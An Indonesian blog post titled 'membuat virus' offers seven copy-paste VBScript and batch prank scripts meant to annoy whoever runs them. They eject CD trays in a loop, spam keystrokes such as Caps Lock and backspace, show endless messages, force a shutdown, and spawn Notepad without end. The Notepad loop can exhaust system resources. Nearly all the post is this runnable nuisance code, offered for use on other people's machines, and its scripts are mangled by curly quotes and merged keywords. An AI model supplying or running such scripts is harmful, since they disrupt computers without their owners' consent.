Google Translate

membuat virus



ok ini q nemu cara membuat virus jail/tidak bahaya tapi cukup membuat orang kesal....
ini ilmu dari dosen jaringan yaitu membuat virus


1. Membuka dan menutup CD/ DVD Komputer Copy script dibawah ini dan paste di notepad anda.
Set oWMP =CreateObject (“WMPlayer.OCX.7″) Set colCDROMs =oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Simpan dengan format *.vbs. Lalu Buka File Tersebut
2. Menulis otomatis di notepad Copy script dibawah ini dan paste di notepad anda.
Set wshShell =wscript.CreateObject (“WScript.Shell”) dowscript.sleep 100 wshshell.sendkeys “Tulisan ini akan menulis sendiri di notepad anda” loop Simpan dengan format *.vbs. Lalu Buka File Tersebut


3. Membuat Pesan muncul berulang – ulang Copy script dibawah ini dan paste di notepad anda. @ECHO
off :Begin msg hahahhaa msg santai boss msg ini hanya main-main msg jangan marah ya msg hanya bercanda GOTO BEGIN Simpan dengan format .bat. Lalu Buka File Tersebut
4. Membuat Komputer Shutdown dengan muncul pesan.
Copy script dibawah ini dan paste di notepad anda. @
echo off msg Hahahahhaha shutdown -s -c “Komputer anda mati” Simpan dengan format .bat. Lalu Buka File Tersebut
5. Membuat Tombol Capslock terus menyala
Copy script dibawah ini dan paste di notepad anda.
Set wshShell=wscript.CreateObject (“WScript.Shell”) dowscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}”
loop Simpan dengan format *.vbs. Lalu Buka File
Tersebut
6. Membuat terus – menerus menekan tombol
“backspace” Copy script dibawah ini dan paste di
notepad anda. MsgBox “Kembali ke menu
sebelumnya” Set wshShell =wscript.CreateObject
(“WScript.Shell”) do wscript.sleep 100
wshshell.sendkeys “{bs}” loop Simpan dengan format *.vbs. Lalu Buka File Tersebut
7. Membuka notepad Terus – menerus Copy script
dibawah ini dan paste di notepad anda. @ECHO off :top START %SystemRoot% \system32\notepad.exe GOTO top Simpan dengan format *.bat. Lalu Buka File Tersebut

jika tidak berhasil bararti anda belum beruntung,,,segera perbaiki niat..hehehehehe
Share this post
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...

0 comments

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

 
© ILMU TEKNIK INFORMATIKA
Designed by BlogThietKe Cooperated with Duy Pham
Released under Creative Commons 3.0 CC BY-NC 3.0
Posts RSSComments RSS
Back to top